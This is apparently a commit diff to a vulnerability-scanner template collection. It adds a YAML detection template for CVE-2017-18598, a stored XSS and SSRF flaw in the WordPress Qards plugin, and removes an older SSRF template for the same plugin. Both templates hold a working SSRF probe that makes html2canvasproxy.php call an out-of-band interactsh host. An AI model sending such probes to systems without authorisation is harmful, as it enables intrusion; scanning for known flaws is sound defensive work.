misc updates

cves/2017/CVE-2017-18598.yaml

@@ -0,0 +1,29 @@
+id: CVE-2017-18598
+
+info:
+  name: Qards Plugin - Stored XSS and SSRF
+  author: pussycat0x
+  severity: medium
+  description: The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php
+  reference:
+    - https://wpscan.com/vulnerability/8934
+    - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-18598
+  tags: cve,cve2017,wordpress,ssrf,xss,wp-plugin,oast
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: body
+        words:
+          - "console.log"

vulnerabilities/wordpress/qards-ssrf.yaml

@@ -1,17 +0,0 @@
-id: qards-ssrf
-info:
-  name: Qards - Server Side Request Forgery
-  author: pussycat0x
-  severity: medium
-  description: Qards provides you easy option to drag and edit every part and element of your site in the front-end, you will never have to write any code to change the layout or to change any part of the site like the traditional WordPress way.
-  reference: https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
-  tags: wordpress,ssrf
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}/'
-    matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "http"